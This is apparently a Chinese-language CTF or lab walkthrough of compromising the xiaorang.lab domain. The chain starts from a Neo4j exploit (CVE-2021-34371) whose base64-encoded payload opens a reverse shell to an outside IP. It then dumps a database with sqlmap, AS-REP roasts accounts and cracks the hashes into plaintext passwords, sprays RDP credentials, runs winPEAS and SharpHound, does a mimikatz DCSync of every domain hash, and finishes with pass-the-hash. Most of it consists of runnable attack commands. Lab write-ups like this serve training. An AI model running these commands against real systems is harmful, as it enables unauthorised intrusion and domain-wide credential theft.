先进行扫描

image-20231006220555052

Neoej 直接google找洞

https://github.com/vulhub/vulhub/blob/master/neo4j/CVE-2021-34371/README.zh-cn.md

1
& 'C:\Program Files\Java\jdk1.8.0_202\bin\java.exe' -jar .\rhino_gadget.jar rmi://39.99.152.125:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuNDIuMzkuMTEwLzMzODkgMD4mMQ}|{base64,-d}|{bash,-i}"

反弹shell到自己的主机

home目录下存在flag

我的习惯是会再弹一个shell给msf

image-20231006220748775

然后上传fscan开始扫描

image-20231006220835558

信息整理

1
2
3
4
5
6
7
172.22.6.36 getshell主机 linux

172.22.6.25 win2019 域内主机

172.22.6.12 域控主机

172.22.6.38 linu机器

然后挂代理 去打这个172.22.6.38

image-20231006220926232

发现可以登录 并且不需要验证码啥的 尝试抓包sqlmap爆破

1
proxychains4 sqlmap -r 1.txt --dump

爆出来三个表

image-20231006221214453

image-20231006221238209

存在几百条用户名

于是写个脚本将用户名提权出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import re

# 打开原始数据文件
with open('1.txt', 'r') as file:
data = file.readlines()

# 提取指定字符串
users = []
for line in data:
match = re.search(r'(\w+)@xiaorang.lab', line)
if match:
username = match.group(1)
users.append(username)

# 保存提取后的字符串到 user.txt
with open('user.txt', 'w') as file:
for user in users:
file.write(user + '\n')

使用尝试预身份认证爆破

1
proxychains python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/

成功了

1
2
3
4
5
6
7
8
出来两个hash值
拿去hashcat爆破
hashcat -a 0 -m 18200 --force hash.txt rockyou.txt

得到两个用户

wenshao:hellokitty
zhangxin:strawberry

进行RDP爆破

1
2
3
proxychains4 crackmapexec rdp 172.22.6.0/24 -u wenshao -p hellokitty -d xiaorang.lab

RDP 172.22.6.25 3389 WIN2019 发现这台机子可以rdp

上去之后没有头绪

上传个winPEAS.exe提权脚本上去

  • 第一步

REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

  • 第二步

winPEASany.exe log=result.txt

另存为ANSI编码格式

image-20231006221746795

type访问得到

image-20231006221851713

得到一个自动登录账户的账号密码

于是RDP尝试成功

上传sharphound.exe进行分析域内环境

image-20231006221938165

发现该用户与域管之间有historySID的关系

于是上传mimikatz.exe导出hash值

1
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

image-20231006222117828

于是进行pth攻击

image-20231006222208484

改个hash值和ip就行了